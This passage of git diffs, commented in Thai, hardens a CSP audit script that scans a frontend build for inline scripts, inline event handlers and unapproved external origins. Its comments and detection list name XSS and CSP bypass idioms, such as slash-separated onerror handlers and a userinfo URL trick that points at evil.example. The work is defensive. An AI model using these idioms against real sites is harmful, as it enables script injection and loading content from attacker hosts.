+    ไม่งั้นไฟล์ที่ไม่เคยถูกเปิดจะถูกนับรวมในคำว่า "ตรวจแล้วสะอาด"
 
 **กฎที่ต้องตรวจ (แต่ละข้อผูกกับ directive จริงใน policy):**
 
@@ -62,6 +70,10 @@ allowlist จึงเล็กและอธิบายได้ครบ —
 
 **Files:**
 - Modify: `scripts/ci-local.sh` · `scripts/ci-local.ps1` (ต่อจากขั้น frontend build เพราะต้องมี `dist`)
+- Modify: `.githooks/pre-push` — **เสียบเพิ่มหลังรีวิว**: ci-local ไม่มีอะไรบังคับให้ใครรัน และ
+  GitHub Actions ปิด auto-trigger อยู่ (quota) hook นี้จึงเป็นที่เดียวที่ gate ถูกบังคับจริงทุกครั้ง ·
+  ตรวจเฉพาะเมื่อมี `dist` อยู่แล้ว เพราะ hook ตั้งใจให้เบา (ไม่ build ให้เอง) และเมื่อไม่มีต้อง
+  **พิมพ์บอกว่ายังไม่ได้ตรวจพร้อมวิธีแก้** ไม่ใช่เงียบ
 - Modify: `docs/frontend-security-headers.md` (§การทดสอบ + แทนที่ตาราง static audit แบบร้อยแก้ว)
 
 - [ ] **Step 1: เสียบเข้า ci-local ทั้งสองไฟล์** หลังบล็อก frontend build (ต้องรันหลัง `npm run build` เพราะอ่าน `dist`)

--- a/scripts/audit-bundle-csp.mjs
+++ b/scripts/audit-bundle-csp.mjs
@@ -153,13 +153,63 @@ const CONNECT_CALL_PATTERNS = [
 ];
 
 /**
- * `url(//host/…)` ใน CSS — browser สืบ scheme จากหน้าเว็บแล้วโหลดจริง
- * regex หลักบังคับ `https?://` จึงมองไม่เห็นรูปนี้ ทั้งที่เอกสารบอกว่าครอบ url() ภายนอกแล้ว
+ * `url(…)` ใน stylesheet — ใช้กับ **ทุกไฟล์ที่อ่าน** ไม่ใช่เฉพาะนามสกุล `.css`
+ * เพราะ `<style>` ใน HTML และ CSS-in-JS ก็ทำให้ browser โหลดจริงเหมือนกัน (หลักการเดียว
+ * กับ R1 ที่ผูกกับรูปทรงของ markup ไม่ใช่ชนิดไฟล์ — บทเรียนจาก C2)
  */
-const CSS_PROTOCOL_RELATIVE_URL = /url\(\s*["']?\/\/([a-zA-Z0-9.-]+(?::\d+)?)/gi;
+const CSS_URL = /url\(\s*["']?([^"')]+)/gi;
 
-/** type ที่ browser ไม่ execute (data block) จึงไม่ถูก script-src บล็อก */
-const NON_EXECUTABLE_TYPES = /type\s*=\s*["']?(application\/(ld\+)?json|text\/template)/i;
+/**
+ * origin ของ URL ที่พบใน bundle — คืน `null` เมื่อเป็น path สัมพัทธ์ (อยู่ใต้ 'self' อยู่แล้ว)
+ *
+ * รองรับ **protocol-relative** (`//host/…`) ด้วย ซึ่งไม่ใช่ relative path: browser เติม
+ * scheme ของหน้าเว็บให้แล้วโหลดข้าม origin จริง (production เป็น https เสมอ มี HSTS)
+ * ของเดิมบังคับ `https?://` ทุกจุด รูปนี้จึงรอดทุกกฎ — ไม่มีอะไรในไฟล์ครอบเลย
+ *
+ * **ข้อจำกัดที่รู้ตัว**: จับ `//host` เฉพาะที่มีบริบทบอกว่าเป็น URL (argument ของ fetch/XHR
+ * หรืออยู่ใน `url()`) · สตริง `//host` ลอย ๆ ไม่ถูกตรวจ เพราะการไล่จับทุกที่ให้ false
+ * positive กับโค้ดปกติ (วัดกับ build จริงแล้วได้ `//i.test` จาก regex literal ที่ bundler ลากมา)
+ */
+function originOf(url) {
+  const trimmed = url.trim();
+  const absolute = /^https?:\/\//i.test(trimmed)
+    ? trimmed
+    : /^\/\/[a-zA-Z0-9]/.test(trimmed)
+      ? `https:${trimmed}`
+      : null;
+  if (absolute === null) return null;
+  try {
+    return new URL(absolute).origin.toLowerCase(); // CSP host-source ไม่แยกตัวพิมพ์
+  } catch {
+    return null;
+  }
+}
+
+/** ชื่อ attribute + ค่า — ใช้แตกแท็กเปิดเป็น Map เพื่อเทียบ **ชื่อเต็ม** ไม่ใช่ substring */
+const HTML_ATTRIBUTE = /([a-zA-Z_:][-a-zA-Z0-9_:.]*)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'`=<>]+)))?/g;
+
+/**
+ * แตก attribute ของแท็กเปิดเป็น Map<name, value>
+ *
+ * ของเดิมเทียบด้วย `/\bsrc\s*=/` ซึ่งพัง เพราะ `\b` ถือว่า `-` เป็นขอบเขตของคำอยู่แล้ว
+ * `data-src=` จึงถูกอ่านว่า "แท็กนี้มี src" แล้วข้ามการตรวจทั้งแท็ก — `data-src` เป็นสำนวน
+ * ของ deferred-script loader ที่ใช้จริง ไม่ใช่เคสสมมติ (review #3)
+ */
+function parseAttributes(attrs) {
+  const map = new Map();
+  for (const match of attrs.matchAll(HTML_ATTRIBUTE)) {
+    const name = match[1].toLowerCase();
+    if (map.has(name)) continue; // HTML ใช้ค่าแรกเมื่อชื่อซ้ำ
+    map.set(name, match[2] ?? match[3] ?? match[4] ?? '');
+  }
+  return map;
+}
+
+/**
+ * type ที่ browser ไม่ execute (data block) จึงไม่ถูก script-src บล็อก
+ * เทียบแบบตรงตัวหลังตัด parameter (`; charset=…`) ออก — type ที่ไม่รู้จักถือว่า execute ได้
+ */
+const NON_EXECUTABLE_TYPES = new Set(['application/json', 'application/ld+json', 'text/template']);
 
 const hasSource = (policy, directive, source) => (policy.get(directive) ?? []).includes(source);
 
@@ -251,8 +301,9 @@ function auditBundle(distDir, cspValue) {
       // ในสตริง JS เสมอ (กัน HTML parser ตัดจบก่อนเวลา) กฎที่จับเป็นคู่จึงมองไม่เห็นเคสนั้นเลย
       // — พิสูจน์ด้วยเทส `HTML fragment ที่ฝังใน JS พร้อม <script>`
       for (const match of content.matchAll(/<script\b([^>]*)>/gi)) {
-        const attrs = match[1];
-        if (/\bsrc\s*=/i.test(attrs) || NON_EXECUTABLE_TYPES.test(attrs)) continue;
+        const attrs = parseAttributes(match[1]);
+        if (attrs.has('src')) continue;
+        if (NON_EXECUTABLE_TYPES.has((attrs.get('type') ?? '').split(';')[0].trim().toLowerCase())) continue;
         // spec R1 พูดถึง inline script "ที่มีเนื้อหา" — แท็กว่างเปล่า browser ไม่บล็อก
         // รับแท็กปิดทั้งรูปปกติและรูปที่ถูก escape · หาไม่เจอ = ถือว่ามีเนื้อหา (fail-closed)
         const after = content.slice(match.index + match[0].length);
@@ -293,13 +344,9 @@ function auditBundle(distDir, cspValue) {
     const reported = new Set();
     for (const pattern of CONNECT_CALL_PATTERNS) {
       for (const match of content.matchAll(pattern)) {
-        if (!/^https?:\/\//i.test(match[1])) continue; // relative URL อยู่ใต้ 'self' อยู่แล้ว
-        let origin;
-        try {
-          origin = new URL(match[1]).origin.toLowerCase();
-        } catch {
-          continue; // parse ไม่ได้ — กฎรวมด้านล่างยังเห็นสตริงนี้อยู่ ไม่ได้หลุดไปเงียบ ๆ
-        }
+        // null = path สัมพัทธ์ ซึ่งอยู่ใต้ 'self' อยู่แล้ว · `//host/…` ไม่นับเป็นสัมพัทธ์
+        const origin = originOf(match[1]);
+        if (origin === null) continue;
         if (connectOrigins.has(origin) || NON_FETCHED_ORIGINS.has(origin) || reported.has(origin)) continue;
         reported.add(origin);
         add(
@@ -320,11 +367,11 @@ function auditBundle(distDir, cspValue) {
     for (const match of content.matchAll(/https?:\/\/[a-zA-Z0-9.-]+(?::\d+)?/g)) {
       countOrigin(match[0].toLowerCase()); // CSP host-source ไม่แยกตัวพิมพ์
     }
-    if (ext === '.css') {
-      // browser สืบ scheme จากหน้าเว็บ ซึ่ง production เป็น https เสมอ (มี HSTS)
-      for (const match of content.matchAll(CSS_PROTOCOL_RELATIVE_URL)) {
-        countOrigin(`https://${match[1].toLowerCase()}`);
-      }
+    // `url(…)` ในทุกไฟล์ ไม่ใช่เฉพาะ .css — `<style>` ใน HTML และ CSS-in-JS โหลดจริงเหมือนกัน
+    // รูปเต็มถูกกฎด้านบนจับไปแล้ว ตรงนี้จึงเก็บรูป protocol-relative ที่ regex นั้นมองไม่เห็น
+    for (const match of content.matchAll(CSS_URL)) {
+      const origin = originOf(match[1]);
+      if (origin !== null) countOrigin(origin);
     }
     for (const [origin, count] of originCounts) {
       add(

--- a/scripts/audit-bundle-csp.mjs
+++ b/scripts/audit-bundle-csp.mjs
@@ -178,7 +178,7 @@ const URL_FUNCTION_ARG = /url\(\s*["']?([^"')]+)/gi;
  * NON_FETCHED_ORIGINS พร้อมเหตุผล (มีเทสล็อกไว้ว่านี่คือการตัดสินใจ ไม่ใช่ความพลาด)
  */
 const URL_ATTRIBUTE_ASSIGNMENT =
-  /(?<![-\w])(?:formaction|srcset|poster|action|href|src)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'`=<>]+))/gi;
+  /(?<![-\w])(?:formaction|srcset|poster|action|href|data|src)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'`=<>]+))/gi;
 
 /**
  * origin ของ URL ที่พบใน bundle — คืน `null` เมื่อเป็น path สัมพัทธ์ (อยู่ใต้ 'self' อยู่แล้ว)
@@ -227,7 +227,18 @@ const isProtocolRelative = (url) => url.trim().startsWith('//');
  * ตัดที่วงเล็บ/จุลภาค/อัฒภาคด้วย เพราะ `url(a),url(b)` ต้องแยกเป็นสอง origin ไม่ใช่ก้อนเดียว
  * ที่ทำให้ตัวหลังหายไปเงียบ ๆ · `[` `]` ถูกเก็บไว้เพราะเป็นส่วนหนึ่งของ IPv6 literal
  */
-const ABSOLUTE_URL_CANDIDATE = /https?:\/\/[^\s"'`<>\\(),;{}]+/gi;
+const ABSOLUTE_URL_CANDIDATE = /https?:\/\/[^\s"'`<>\\)]+/gi;
+
+/**
+ * เครื่องหมายวรรคตอนท้ายก้อนที่ไม่ใช่ส่วนหนึ่งของ URL — ตัดทิ้งก่อนส่งให้ URL parser
+ *
+ * ทำแบบนี้แทนการใส่อักขระเหล่านี้ใน character class ด้านบน เพราะ `, ; { }` **อยู่ในส่วน
+ * userinfo ได้ตามมาตรฐาน URL** และ host จริงถูกตัดสินด้วย `@` ตัวสุดท้าย — การใช้มันเป็น
+ * ตัวตัดจึงเปิดช่องเดียวกับที่ review ฉ ปิดไป: `https://fonts.gstatic.com,x@evil.example/`
+ * ถูกอ่านเป็น origin ที่ policy อนุญาต ทั้งที่ browser โหลดไป evil.example (review ซ)
+ * `)` ยังตัดอยู่ในตัว regex เพราะมันปิด `url(…)` จริง และ `url(a),url(b)` ต้องแยกเป็นสอง origin
+ */
+const stripTrailingPunctuation = (url) => url.replace(/[.,;:{}!?'"]+$/, '');
 
 /**
  * ความยาวสูงสุดที่ยอมให้แท็กเปิดกินพื้นที่ — แท็กจริงไม่ยาวขนาดนี้ ส่วนในไฟล์ JS `a<b`
@@ -254,6 +265,7 @@ function* openTags(content) {
     let quote = null;
     let i = from;
     let terminated = false;
+    let truncated = false;
     for (; i < limit; i++) {
       const ch = content[i];
       if (quote !== null) {
@@ -264,9 +276,44 @@ function* openTags(content) {
       else if (ch === '<') break; // แท็กเปิดซ้อนแท็กเปิดไม่ได้ — ตัวแรกไม่ใช่แท็กจริง
       else if (ch === '>') { terminated = true; break; }
     }
-    yield { name: start[1].toLowerCase(), attrs: content.slice(from, i), end: i, terminated };
+    // ชนลิมิตทั้งที่ยังไม่จบแท็ก = **อ่านไม่ครบ** ซึ่งต่างจากการเจอ `<` (แปลว่าไม่ใช่แท็กจริง)
+    // สองกรณีนี้ต้องแยกกัน เพราะกรณีแรกคือ "ไม่รู้" ที่ห้ามกลายเป็น "สะอาด"
+    if (!terminated && i === limit && limit < content.length) truncated = true;
+    yield { name: start[1].toLowerCase(), attrs: content.slice(from, i), end: i, terminated, truncated };
   }
 }
+
+/**
+ * ชื่อ attribute ที่ browser ถือว่าเป็น **event handler content attribute** จริง
+ *
+ * ใช้ชุดปิดแทนรูป `on` + ตัวอักษรอะไรก็ได้ เพราะ **นี่คือความหมายของ CSP จริง ไม่ใช่ heuristic**:
+ * attribute ชื่อ `onfoo` ที่ไม่มีในรายการนี้ browser ไม่ compile เป็นโค้ดตั้งแต่แรก จึงไม่มีอะไร
+ * ให้ `script-src` บล็อก · ผลพลอยได้คือปิด regression M-A ที่ยั้งไม่อยู่มาสามรอบ — ` once = `
+ * และ ` only = ` ในโค้ด JS ที่ถูกอ่านเป็น pseudo-tag จะตกไปเองเพราะไม่ใช่ชื่อ event
+ *
+ * **ข้อจำกัดที่รู้ตัว**: event ที่ browser เพิ่มในอนาคตจะหลุดจนกว่าจะมีคนเติมที่นี่ — เป็นการ
+ * แลกที่ตั้งใจ เพราะทางเลือกเดิม (รับทุกคำที่ขึ้นต้นด้วย on) ให้ false positive กับโค้ดปกติ
+ * ซึ่งทำให้คนเลิกเชื่อ gate ทั้งตัว · รายการนี้มาจาก event handler content attributes ของ
+ * HTML spec รวมกับกลุ่ม pointer/touch/animation/transition ที่ browser รองรับจริง
+ */
+const EVENT_HANDLER_ATTRIBUTES = new Set([
+  'onabort', 'onafterprint', 'onanimationcancel', 'onanimationend', 'onanimationiteration', 'onanimationstart',
+  'onauxclick', 'onbeforeinput', 'onbeforematch', 'onbeforeprint', 'onbeforetoggle', 'onbeforeunload', 'onblur',
+  'oncancel', 'oncanplay', 'oncanplaythrough', 'onchange', 'onclick', 'onclose', 'oncontextlost', 'oncontextmenu',
+  'oncontextrestored', 'oncopy', 'oncuechange', 'oncut', 'ondblclick', 'ondrag', 'ondragend', 'ondragenter',
+  'ondragleave', 'ondragover', 'ondragstart', 'ondrop', 'ondurationchange', 'onemptied', 'onended', 'onerror',
+  'onfocus', 'onfocusin', 'onfocusout', 'onformdata', 'ongotpointercapture', 'onhashchange', 'oninput', 'oninvalid',
+  'onkeydown', 'onkeypress', 'onkeyup', 'onlanguagechange', 'onload', 'onloadeddata', 'onloadedmetadata',
+  'onloadstart', 'onlostpointercapture', 'onmessage', 'onmessageerror', 'onmousedown', 'onmouseenter',
+  'onmouseleave', 'onmousemove', 'onmouseout', 'onmouseover', 'onmouseup', 'onoffline', 'ononline', 'onpagehide',
+  'onpageshow', 'onpaste', 'onpause', 'onplay', 'onplaying', 'onpointercancel', 'onpointerdown', 'onpointerenter',
+  'onpointerleave', 'onpointermove', 'onpointerout', 'onpointerover', 'onpointerup', 'onpopstate', 'onprogress',
+  'onratechange', 'onrejectionhandled', 'onreset', 'onresize', 'onscroll', 'onscrollend', 'onsecuritypolicyviolation',
+  'onseeked', 'onseeking', 'onselect', 'onselectionchange', 'onselectstart', 'onslotchange', 'onstalled',
+  'onstorage', 'onsubmit', 'onsuspend', 'ontimeupdate', 'ontoggle', 'ontouchcancel', 'ontouchend', 'ontouchmove',
+  'ontouchstart', 'ontransitioncancel', 'ontransitionend', 'ontransitionrun', 'ontransitionstart',
+  'onunhandledrejection', 'onunload', 'onvolumechange', 'onwaiting', 'onwheel',
+]);
 
 /** ชื่อ attribute + ค่า — ใช้แตกแท็กเปิดเป็น Map เพื่อเทียบ **ชื่อเต็ม** ไม่ใช่ substring */
 const HTML_ATTRIBUTE = /([a-zA-Z_:][-a-zA-Z0-9_:.]*)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'`=<>]+)))?/g;
@@ -338,20 +385,31 @@ function inlineScriptFindings(content) {
       const executable = !attrs.has('src') && !isNonExecutableType(attrs.get('type'));
       // spec R1 พูดถึง inline script "ที่มีเนื้อหา" — แท็กว่างเปล่า browser ไม่บล็อก
       // รับแท็กปิดทั้งรูปปกติและรูปที่ถูก escape · หาไม่เจอ = ถือว่ามีเนื้อหา (fail-closed)
-      const after = content.slice(tag.end + 1);
+      // `end` ชี้ที่ `>` เฉพาะตอน terminated — ตอนอื่นชี้ที่ `<` ตัวถัดไปหรือที่ลิมิต
+      const after = content.slice(tag.terminated ? tag.end + 1 : tag.end);
       const closeAt = after.search(/<\\?\/script\s*>/i);
       const empty = closeAt !== -1 && after.slice(0, closeAt).trim() === '';
       if (executable && !empty) {
         found.push({ rule: 'inline-script', directive: 'script-src', detail: `พบ <script> ที่ไม่มี src (โค้ดฝังในตัว): ${`<script${tag.attrs}>`.slice(0, 60)}` });
       }
     }
-    // handler ต้องมีหลักฐานว่าเป็นแท็กจริง — ไม่งั้น `a<b && once = true` ในไฟล์ JS ถูกอ่าน
-    // เป็นแท็กแล้ว ` once =` ถูกจับเป็น handler (regression M-A จากอีกทางหนึ่ง)
+    // อ่านแท็กไม่จบเพราะชนลิมิต = ตรวจไม่ได้ ต้องฟ้อง ไม่ใช่เงียบ ("ไม่รู้" ห้ามเป็น "สะอาด")
+    // ต่างจากการเจอ `<` ตัวถัดไป ซึ่งแปลว่านี่ไม่ใช่แท็กจริงตั้งแต่แรก จึงข้ามได้อย่างมีเหตุผล
+    if (tag.truncated) {
+      found.push({
+        rule: 'unparsable-tag',
+        directive: 'script-src',
+        detail: `แท็ก <${tag.name}> ยาวเกิน ${OPEN_TAG_SCAN_LIMIT} ตัวอักษรจนอ่าน attribute ไม่ครบ — ตรวจ inline handler ในแท็กนี้ไม่ได้`,
+      });
+      continue;
+    }
     if (!tag.terminated) continue;
-    // `["']?` เพราะ HTML ยอมให้ค่า attribute ไม่มีเครื่องหมายคำพูด (`<button onclick=go()>`)
-    // ซึ่งของเดิมหลุด — `frontend/public/50x.html` เป็นไฟล์ที่คนแก้ด้วยมือ จึงเกิดได้จริง
-    for (const match of tag.attrs.matchAll(/\son[a-z]+\s*=\s*["']?/gi)) {
-      found.push({ rule: 'inline-event-handler', directive: 'script-src', detail: `พบ inline event handler: ${match[0].trim()} ใน ${`<${tag.name}${tag.attrs}`.slice(0, 40)}` });
+    // แตก attribute ด้วยตัวเดียวกับที่ branch <script> ใช้ แทนการยิง regex ดิบทับ attrs
+    // ของเดิมบังคับ whitespace นำหน้า (`/\son[a-z]+/`) ซึ่ง HTML ไม่ได้บังคับ — `<img/onerror=…>`
+    // และ `<a href="x"onclick=…>` จึงหลุดทั้งคู่ ทั้งที่เป็นสำนวน bypass ที่ใช้กันจริง (review ฌ)
+    for (const name of parseAttributes(tag.attrs).keys()) {
+      if (!EVENT_HANDLER_ATTRIBUTES.has(name)) continue;
+      found.push({ rule: 'inline-event-handler', directive: 'script-src', detail: `พบ inline event handler: ${name}= ใน ${`<${tag.name}${tag.attrs}`.slice(0, 40)}` });
     }
   }
   return found;
@@ -412,7 +470,7 @@ function externalOriginFindings(content, { policy, connectOrigins, allowedOrigin
   };
   // ให้ URL parser เป็นคนบอกว่า host คืออะไร ไม่ใช่ character class (ดู ABSOLUTE_URL_CANDIDATE)
   for (const match of content.matchAll(ABSOLUTE_URL_CANDIDATE)) {
-    const origin = originOf(match[0]); // lowercase ให้แล้ว — CSP host-source ไม่แยกตัวพิมพ์
+    const origin = originOf(stripTrailingPunctuation(match[0])); // lowercase ให้แล้ว
     if (origin !== null) countOrigin(origin);
   }
 

--- a/scripts/audit-bundle-csp.mjs
+++ b/scripts/audit-bundle-csp.mjs
@@ -102,16 +102,18 @@ function parseCspPolicy(value) {
   return policy;
 }
 
-/** origin ที่ source list ชุดหนึ่งอนุญาต — keyword อย่าง 'self'/'none' ไม่ใช่ origin จึงถูกข้าม */
-function originsOf(sources) {
+/**
+ * origin ที่ source list ของ directive หนึ่งอนุญาต
+ *
+ * keyword (`'self'`/`'none'`) และ host pattern ที่มี wildcard ไม่ใช่ origin ที่เทียบตรงตัวได้
+ * จึงถูกข้าม — ไม่ใช่ allowlist ที่เชื่อได้ · ใช้ `originOf` ตัวเดียวกับฝั่ง bundle เพื่อไม่ให้
+ * ตรรกะแปลง URL→origin มีสองสำเนาที่เพี้ยนออกจากกันได้
+ */
+function policyOrigins(sources) {
   const origins = new Set();
   for (const source of sources ?? []) {
-    if (!/^https?:\/\//.test(source)) continue;
-    try {
-      origins.add(new URL(source).origin.toLowerCase());
-    } catch {
-      // source ที่ไม่ใช่ URL เต็ม (เช่น host pattern) — ข้ามไป ไม่ใช่ allowlist ที่เชื่อได้
-    }
+    const origin = originOf(source);
+    if (origin !== null) origins.add(origin);
   }
   return origins;
 }
@@ -128,7 +130,7 @@ function originsOf(sources) {
 function allowedOriginsFrom(policy) {
   const origins = new Set();
   for (const sources of policy.values()) {
-    for (const origin of originsOf(sources)) origins.add(origin);
+    for (const origin of policyOrigins(sources)) origins.add(origin);
   }
   return origins;
 }
@@ -153,37 +155,57 @@ const CONNECT_CALL_PATTERNS = [
 ];
 
 /**
- * `url(…)` ใน stylesheet — ใช้กับ **ทุกไฟล์ที่อ่าน** ไม่ใช่เฉพาะนามสกุล `.css`
- * เพราะ `<style>` ใน HTML และ CSS-in-JS ก็ทำให้ browser โหลดจริงเหมือนกัน (หลักการเดียว
- * กับ R1 ที่ผูกกับรูปทรงของ markup ไม่ใช่ชนิดไฟล์ — บทเรียนจาก C2)
+ * argument ของ `url(…)` — ใช้กับ **ทุกไฟล์ที่อ่าน** ไม่ใช่เฉพาะนามสกุล `.css` เพราะ `<style>`
+ * ใน HTML และ CSS-in-JS ก็ทำให้ browser โหลดจริงเหมือนกัน (หลักการเดียวกับ R1 ที่ผูกกับ
+ * รูปทรงของ markup ไม่ใช่ชนิดไฟล์ — บทเรียนจาก C2)
  */
-const CSS_URL = /url\(\s*["']?([^"')]+)/gi;
+const URL_FUNCTION_ARG = /url\(\s*["']?([^"')]+)/gi;
+
+/**
+ * attribute ที่ค่าเป็น URL ซึ่ง browser โหลดจริง จึงอยู่ใต้ directive ของ CSP
+ * `srcset` แยกด้วย comma และมี descriptor ต่อท้าย จึงถูกแตกก่อนเทียบ
+ */
+const URL_ATTRIBUTES = new Set(['src', 'href', 'srcset', 'poster', 'data', 'action', 'formaction']);
 
 /**
  * origin ของ URL ที่พบใน bundle — คืน `null` เมื่อเป็น path สัมพัทธ์ (อยู่ใต้ 'self' อยู่แล้ว)
+ * หรือเมื่อไม่ใช่ URL ที่ parse เป็น origin ได้
  *
  * รองรับ **protocol-relative** (`//host/…`) ด้วย ซึ่งไม่ใช่ relative path: browser เติม
  * scheme ของหน้าเว็บให้แล้วโหลดข้าม origin จริง (production เป็น https เสมอ มี HSTS)
- * ของเดิมบังคับ `https?://` ทุกจุด รูปนี้จึงรอดทุกกฎ — ไม่มีอะไรในไฟล์ครอบเลย
  *
- * **ข้อจำกัดที่รู้ตัว**: จับ `//host` เฉพาะที่มีบริบทบอกว่าเป็น URL (argument ของ fetch/XHR
- * หรืออยู่ใน `url()`) · สตริง `//host` ลอย ๆ ไม่ถูกตรวจ เพราะการไล่จับทุกที่ให้ false
- * positive กับโค้ดปกติ (วัดกับ build จริงแล้วได้ `//i.test` จาก regex literal ที่ bundler ลากมา)
+ * เงื่อนไขหลัง `//` เป็น "อะไรก็ได้ที่ไม่ใช่ `/` หรือช่องว่าง" ไม่ใช่ alnum — ของเดิมบังคับ alnum
+ * แล้วตัด IPv6 literal (`//[2001:db8::1]/`) กับ host ที่ขึ้นต้นด้วย `_` ทิ้งเป็น null ทั้งที่
+ * browser resolve และยิงจริง ส่วนกฎรวมก็มองไม่เห็นเพราะบังคับ `https?://` เหมือนกัน
+ * = ไม่มีกฎไหนครอบ ซึ่งเป็นช่องคลาสเดียวกับที่ฟังก์ชันนี้ถูกสร้างมาปิดพอดี
+ *
+ * **ข้อจำกัดที่รู้ตัว**: จับ `//host` เฉพาะที่มีบริบทบอกว่าเป็น URL (argument ของ fetch/XHR,
+ * ใน `url()`, หรือค่าของ attribute ใน URL_ATTRIBUTES) · สตริง `//host` ลอย ๆ ไม่ถูกตรวจ
+ * เพราะการไล่จับทุกที่ให้ false positive กับโค้ดปกติ (วัดกับ build จริงแล้วได้ `//i.test`
+ * จาก regex literal ที่ bundler ลากมา)
  */
 function originOf(url) {
   const trimmed = url.trim();
-  const absolute = /^https?:\/\//i.test(trimmed)
-    ? trimmed
-    : /^\/\/[a-zA-Z0-9]/.test(trimmed)
-      ? `https:${trimmed}`
-      : null;
-  if (absolute === null) return null;
+  if (!/^(?:https?:)?\/\//i.test(trimmed)) return null; // path สัมพัทธ์ หรือ scheme อื่น
+  const absolute = trimmed.startsWith('//') ? `https:${trimmed}` : trimmed;
+  if (/^https:\/\/[/\s]/.test(absolute)) return null; // `///…` ไม่ใช่ host ที่โหลดได้
   try {
     return new URL(absolute).origin.toLowerCase(); // CSP host-source ไม่แยกตัวพิมพ์
   } catch {
     return null;
   }
 }
+
+/** URL ที่ต้องอาศัย scheme ของหน้าเว็บ — กฎรวมที่บังคับ `https?://` มองไม่เห็นรูปนี้ */
+const isProtocolRelative = (url) => url.trim().startsWith('//');
+
+/**
+ * quote ที่ปิดไม่ครบแปลว่าแยก attribute ไม่ได้จริง — `<script data-x=" src=y>` จะถูกอ่านว่ามี
+ * `src` ทั้งที่ไม่มี แล้วแท็กถูกข้ามทั้งอัน (fail-open รูปเดียวกับ review #3)
+ * กรณีนี้ต้อง **ไม่เชื่อผลการแตก** แล้วตรวจต่อ ไม่ใช่ข้าม
+ */
+const quotesBalanced = (attrText) =>
+  (attrText.match(/"/g) ?? []).length % 2 === 0 && (attrText.match(/'/g) ?? []).length % 2 === 0;
 
 /** ชื่อ attribute + ค่า — ใช้แตกแท็กเปิดเป็น Map เพื่อเทียบ **ชื่อเต็ม** ไม่ใช่ substring */
 const HTML_ATTRIBUTE = /([a-zA-Z_:][-a-zA-Z0-9_:.]*)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'`=<>]+)))?/g;
@@ -210,6 +232,9 @@ function parseAttributes(attrs) {
  * เทียบแบบตรงตัวหลังตัด parameter (`; charset=…`) ออก — type ที่ไม่รู้จักถือว่า execute ได้
  */
 const NON_EXECUTABLE_TYPES = new Set(['application/json', 'application/ld+json', 'text/template']);
+
+/** type ของแท็ก `<script>` ที่ browser ไม่ execute — ตัด parameter (`; charset=…`) ก่อนเทียบตรงตัว */
+const isNonExecutableType = (value) => NON_EXECUTABLE_TYPES.has((value ?? '').split(';')[0].trim().toLowerCase());
 
 const hasSource = (policy, directive, source) => (policy.get(directive) ?? []).includes(source);
 
@@ -245,7 +270,7 @@ function auditBundle(distDir, cspValue) {
   const policy = parseCspPolicy(cspValue);
   const allowedOrigins = allowedOriginsFrom(policy);
   // allowlist แยกสำหรับ URL ที่รู้บริบทแล้วว่าเป็น request — ต้องผ่าน connect-src เท่านั้น
-  const connectOrigins = originsOf(policy.get('connect-src'));
+  const connectOrigins = policyOrigins(policy.get('connect-src'));
   // directive ที่รายงานต้องสะท้อน policy จริง แก้ policy แล้วข้อความตามเอง
   const consultedDirectives = FETCH_DIRECTIVES.filter((d) => policy.has(d)).join(' / ') || 'default-src';
   const allowsInlineScript = hasSource(policy, 'script-src', "'unsafe-inline'");
@@ -301,9 +326,10 @@ function auditBundle(distDir, cspValue) {
       // ในสตริง JS เสมอ (กัน HTML parser ตัดจบก่อนเวลา) กฎที่จับเป็นคู่จึงมองไม่เห็นเคสนั้นเลย
       // — พิสูจน์ด้วยเทส `HTML fragment ที่ฝังใน JS พร้อม <script>`
       for (const match of content.matchAll(/<script\b([^>]*)>/gi)) {
-        const attrs = parseAttributes(match[1]);
+        // เชื่อผลการแตก attribute ได้ก็ต่อเมื่อ quote ปิดครบ ไม่งั้นตรวจต่อ (fail-closed)
+        const attrs = quotesBalanced(match[1]) ? parseAttributes(match[1]) : new Map();
         if (attrs.has('src')) continue;
-        if (NON_EXECUTABLE_TYPES.has((attrs.get('type') ?? '').split(';')[0].trim().toLowerCase())) continue;
+        if (isNonExecutableType(attrs.get('type'))) continue;
         // spec R1 พูดถึง inline script "ที่มีเนื้อหา" — แท็กว่างเปล่า browser ไม่บล็อก
         // รับแท็กปิดทั้งรูปปกติและรูปที่ถูก escape · หาไม่เจอ = ถือว่ามีเนื้อหา (fail-closed)
         const after = content.slice(match.index + match[0].length);
@@ -367,11 +393,27 @@ function auditBundle(distDir, cspValue) {
     for (const match of content.matchAll(/https?:\/\/[a-zA-Z0-9.-]+(?::\d+)?/g)) {
       countOrigin(match[0].toLowerCase()); // CSP host-source ไม่แยกตัวพิมพ์
     }
-    // `url(…)` ในทุกไฟล์ ไม่ใช่เฉพาะ .css — `<style>` ใน HTML และ CSS-in-JS โหลดจริงเหมือนกัน
-    // รูปเต็มถูกกฎด้านบนจับไปแล้ว ตรงนี้จึงเก็บรูป protocol-relative ที่ regex นั้นมองไม่เห็น
-    for (const match of content.matchAll(CSS_URL)) {
-      const origin = originOf(match[1]);
+    // สองกฎด้านล่างเก็บ **เฉพาะรูป protocol-relative** เพราะรูปเต็มถูก regex ด้านบนนับไปแล้ว
+    // ถ้าไม่กรอง origin เดียวจะถูกนับสองรอบ แล้วจำนวนครั้งในข้อความ error ผิดเป็นเท่าตัว
+    // (flag `i` ของ URL_FUNCTION_ARG ทำให้ `new URL("https://…")` ในไฟล์ JS เข้าข่ายด้วย)
+    const countIfProtocolRelative = (raw) => {
+      if (!isProtocolRelative(raw)) return;
+      const origin = originOf(raw);
       if (origin !== null) countOrigin(origin);
+    };
+
+    // `url(…)` ในทุกไฟล์ ไม่ใช่เฉพาะ .css — `<style>` ใน HTML และ CSS-in-JS โหลดจริงเหมือนกัน
+    for (const match of content.matchAll(URL_FUNCTION_ARG)) countIfProtocolRelative(match[1]);
+
+    // attribute ที่ค่าเป็น URL — `<img src="//host">` / `<link href="//host">` คือบริบทที่บอกว่า
+    // เป็น URL ชัดกว่า url() ด้วยซ้ำ การไม่ตรวจทำให้ข้อจำกัดที่ประกาศไว้บรรยายของจริงผิด
+    for (const tag of content.matchAll(/<[a-zA-Z][^>]*>/g)) {
+      if (!quotesBalanced(tag[0])) continue; // แยก attribute ไม่ได้ — กฎรวมยังคุมสตริงอยู่
+      for (const [name, value] of parseAttributes(tag[0].replace(/^<[a-zA-Z][a-zA-Z0-9-]*/, ''))) {
